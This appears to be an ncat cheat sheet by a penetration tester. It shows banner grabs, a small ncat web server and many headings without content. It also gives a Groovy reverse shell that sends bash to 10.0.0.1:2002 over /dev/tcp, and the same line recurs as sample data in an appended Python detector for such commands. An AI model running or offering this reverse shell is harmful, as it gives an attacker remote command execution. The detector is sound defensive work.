Name
ncat — Concatenate and redirect sockets

Synopsis
ncat [ <OPTIONS> ...] [ <hostname> ] [ <port> ]

Banner Grab

printf "GET / HTTP/1.0\r\n\r\n" | ncat bitrot.sh 80
HTTP/1.1 301 Moved Permanently
Server: nginx
Date: Tue, 19 Dec 2017 20:01:10 GMT
Content-Type: text/html
Content-Length: 178
Connection: close
Location: https://bitrot.sh/

<html>
<head><title>301 Moved Permanently</title></head>
<body bgcolor="white">
<center><h1>301 Moved Permanently</h1></center>
<hr><center>nginx</center>
</body>
</html>

SSL Banner Grab

printf "GET / HTTP/1.0\r\n\r\n" | ncat bitrot.sh 443 --ssl
HTTP/1.1 200 OK
Server: nginx
Date: Tue, 19 Dec 2017 20:01:59 GMT
Content-Type: text/html
Content-Length: 28379
Last-Modified: Tue, 19 Dec 2017 15:31:41 GMT
Connection: close
ETag: "5a3930dd-6edb"
Accept-Ranges: bytes

<!DOCTYPE html>
<html lang="en">
...

Simple Web Server

echo '<html><body>This is ncat webserver</body></html>' > stuff.html
ncat -l -p 8080 -c "printf 'HTTP/1.1 200 OK\r\n\r\n'; cat stuff.html"

A Better HTTP Server

Unwrap SSL Connections

Connect two incoming connections

Connect two listening servers

Telnet

Simple Chat

Copy Files with UDP

Access Controls

Whitelist IPs

Whitelist from file

Blacklist IPs

Blacklist IPs from file

File Transfer with SSL

Reverse file transfer to attacker

File send w/ Sender listening

Bind Shell

Reverse Shell

Bash

Perl

PHP

PowerShell

Python 2.7 and 3

Ruby

Netcat

Java

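// Groovy syntax on the JVM (untyped variables, "as String[]", \$ escape); not compilable as plain Java.
// Starts bash with file descriptor 5 opened on /dev/tcp/10.0.0.1/2002 and runs each line read from it.
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()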
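
Added example (not part of the original cheat sheet): a defender-side check that flags, in process command lines, the two patterns this page shows, ncat started with -c/-e (as in the Simple Web Server listener) and a bash /dev/tcp redirection (as in the snippet above). The sample command lines are constructed, and the function names are this example's own.

```python
import re
import shlex

# /dev/tcp/<host>/<port> is a bash pseudo-path; opening it creates a TCP socket.
DEV_TCP = re.compile(r"/dev/(?:tcp|udp)/([^/\s;]+)/(\d+)")
# ncat options that attach a program to the socket.
NCAT_EXEC_FLAGS = {"-e", "--exec", "-c", "--sh-exec"}


def classify(cmdline):
    """Return a list of findings for one process command line."""
    findings = []
    m = DEV_TCP.search(cmdline)
    if m:
        findings.append(f"bash network redirection to {m.group(1)}:{m.group(2)}")
    try:
        argv = shlex.split(cmdline)
    except ValueError:  # unbalanced quotes: fall back to a plain split
        argv = cmdline.split()
    if argv and argv[0].rsplit("/", 1)[-1] == "ncat":
        if any(a.split("=", 1)[0] in NCAT_EXEC_FLAGS for a in argv[1:]):
            findings.append("ncat started with a program attached to the socket")
    return findings


def scan(lines):
    """Map each flagged command line to its findings."""
    hits = {}
    for line in lines:
        found = classify(line)
        if found:
            hits[line] = found
    return hits


# Constructed sample command lines, e.g. as recorded by execve auditing.
SAMPLES = [
    "ncat -l -p 8080 -c 'cat stuff.html'",
    "/bin/bash -c 'exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do $line 2>&5 >&5; done'",
    "ncat bitrot.sh 443 --ssl",
    "cat /var/log/nginx/access.log",
]

if __name__ == "__main__":
    for line, hits in scan(SAMPLES).items():
        print(hits, "<-", line)
```

A plain client connection such as the SSL banner grab is not flagged; only command lines that bind a program to a socket are.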

xterm

security researcher and penetration tester. twitter: @kali_null